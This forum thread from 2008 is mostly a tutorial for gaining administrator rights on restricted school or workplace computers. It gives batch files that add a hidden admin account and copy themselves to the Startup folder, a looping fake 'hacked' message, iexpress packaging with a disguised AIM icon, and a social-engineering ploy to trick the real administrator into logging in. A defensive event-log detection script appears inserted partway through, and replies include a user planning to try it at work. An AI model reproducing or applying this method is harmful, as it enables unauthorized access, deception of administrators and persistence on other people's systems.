The back door batch



teknicalissue
02-02-2008, 10:50 PM
before i continue i must state that i have no intentions of using my knowledge for any malicious intent AND this tutorial is for EDUCATIONAL PURPOSES ONLY!! meaning if you do it and get in trouble, don't blame it on me

ok many of you guys have restricted user access in school, work place, and even a very bad ******* cyber cafe/library. many of these restrictions are caused by the simple "restricted user" option and in many places, your user account is "customly" ******* by the group policy and such.. now what we are about to do requires a bit of social engineering and a simple bat/exe file that we are going to make. now let's start on our batch file.
(open up notepad by start->run->notepad)

lets start the batch


@echo off


for those of you who do not know what some of these commands mean..please look at my first batch file tut HERE (http://www.all-nettools.com/forum/showthread.php?t=6*0*)

now first we are going to add the new user which in this case, is going to be cybernin


@echo off
net user cybernin tico /add


this command will create the new username named "cybernin" with the password "tico". this command alone will not give us administrator privileges so we must add ourselves as admins with this code


net localgroup administrators cybernin /add


now in total we should have:


@echo off
net user cybernin tico /add
net localgroup administrators cybernin /add

save it as "newuser.bat"

ok at the current moment if you run this batch file you will get the access denied 5 error code thing soooo lets make a "fake" virus. open up notepad again and start it off.



@echo off
:start
call msg * "YOU HAVE BEEN HACKED!!! WE DETECT THAT YOUR RUNNING ON A RESTRICTED USER MACHINE, HAHAHA! THE ONLY WAY TO STOP THIS IS BY LOGING IN AS A USER WITH ADMIN PRIVLIGES AND REMOVE ME FROM THE REGISTRY..HA GOOD LUCK NEWBBZZZ"
GOTO start


now that we have this, lets save it as message.bat

so now we have newuser.bat and message.bat
lets make two batch files to start up both processes the way we want them to start. one of the batch files should have
save this as start*.bat


@echo off
start newuser.exe
copy "newuser.exe" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"


and the other one should be named start2.bat with the following code



@echo off
start message.exe


now we're going to make them exe's using the converter on the link provided above.

make newuser.bat, message.bat, start*.bat, and start2.bat into exe's (each one an exe so the output is newuser.exe, message.exe, start*.exe, and start2.exe)

now lets open up windows packager (start->run->iexpress)

now create a new self extraction then click next
select extract and install (the first choice Buzzo) then next
give it a random title
then no prompt then next
no license..next
ah now we add our start*.exe, start2.exe,message.exe and newuser.exe in to this wonderful white box and click next
on the box that says install program select start*.exe then for the bottom select start2.exe
click next
select hidden then next
no message, next
now check hide process animation from user and click browse to save it and give it a name like above
no restart, next
don't save if you do then save i don't care, next
then create and your exe will be created.. NOW! look at the fugly icon..
use my icon changer and look for an AIM icon or something to make it believable, my icon changer is pretty self explanatory (and not..its really not mine) so i don't feel like getting into the icon changer since even a stupid one can do it. your .exe is now alive and kicking.

now we go to the target computer and make sure that person with the admin pass is around and launch the program we made..it should copy itself to startup and open the message boxes NOW to go tell your admin.."hey something up with the comp..it says i have to log in as admin or something.." they go up to the comp put in their information and as soon as they start, BAM you have your very own username =)

hope you liked this tut

thanks again to

myspace
syntax (gave me first codes for admin =))
m00nbat (his name really makes me want to talk to him for some reason..)
CPL.T taught me everything i know
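
From the defender's side, the two `net` commands in the post leave a distinctive trace: an account-creation record followed almost at once by the same account being added to the local Administrators group. The sketch below is an added example, not part of the original post; it correlates Windows Security events 4720 (user account created) and 4732 (member added to a local group) over constructed sample records, and the record field names, host names, SIDs and the five-minute window are assumptions.

```python
from datetime import datetime, timedelta

ADMINS_SID = "S-1-5-32-544"      # well-known SID of BUILTIN\Administrators
WINDOW = timedelta(minutes=5)    # assumed correlation window

# Constructed sample records, reduced to the fields the check needs.
EVENTS = [
    {"time": "2024-03-04T08:59:40", "id": 4720, "subject": "CORP\\helpdesk",
     "target_sid": "S-1-5-21-1-2-3-1101", "target_name": "jsmith"},
    {"time": "2024-03-04T09:14:02", "id": 4732, "subject": "LAB07\\Administrator",
     "member_sid": "S-1-5-21-1-2-3-1102", "group_sid": ADMINS_SID},
    {"time": "2024-03-04T09:14:02", "id": 4720, "subject": "LAB07\\Administrator",
     "target_sid": "S-1-5-21-1-2-3-1102", "target_name": "cybernin"},
    {"time": "2024-03-04T11:30:00", "id": 4732, "subject": "CORP\\helpdesk",
     "member_sid": "S-1-5-21-1-2-3-1050", "group_sid": ADMINS_SID},
]


def find_new_local_admins(events, window=WINDOW):
    """Return one alert per account created and made local admin within `window`."""
    created = {}   # account SID -> (creation time, account name, creator)
    alerts = []
    # Sort by (time, id) so a 4720 is seen before a 4732 with the same timestamp.
    for ev in sorted(events, key=lambda e: (e["time"], e["id"])):
        when = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4720:
            created[ev["target_sid"]] = (when, ev["target_name"], ev["subject"])
        elif ev["id"] == 4732 and ev["group_sid"] == ADMINS_SID:
            hit = created.get(ev["member_sid"])
            # Only accounts that were themselves created moments earlier are flagged;
            # adding a long-standing account to the group is a separate review item.
            if hit and when - hit[0] <= window:
                alerts.append({
                    "account": hit[1],
                    "created_by": hit[2],
                    "promoted_by": ev["subject"],
                    "seconds_apart": (when - hit[0]).total_seconds(),
                })
    return alerts


if __name__ == "__main__":
    for alert in find_new_local_admins(EVENTS):
        print(alert)
```

Because the batch file runs inside the administrator's own session, the subject on both events is the legitimate admin account, so the alert has to key on the pairing and timing rather than on who performed the action. Reviewing the All Users Startup folder for unexpected executables covers the persistence step the post relies on.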

Moonbat
02-03-2008, 11:44 AM
Another good tut for getting admin, but I'll have to rate this one lower because it involves some degree of social engineering (i.e. lying, tricking) to get the admin to login as administrator. So, 8/*0 for this one. But still, keep up the good work.

Which reminds me, I need to start writing some tuts...

teknicalissue
02-03-2008, 01:55 PM
thanks m00nbat, one more thing if you (not addressing to m00nbat specifically) don't feel comfortable about the whole social engineering thing just leave it in the start up and return within a week lol sooner or later they must have logged in as admin;) i will now write another tut lol

jode
02-05-2008, 07:00 AM
you Good .. i Will try this in a computer work

teknicalissue
02-05-2008, 10:03 AM
let me know how it works out =)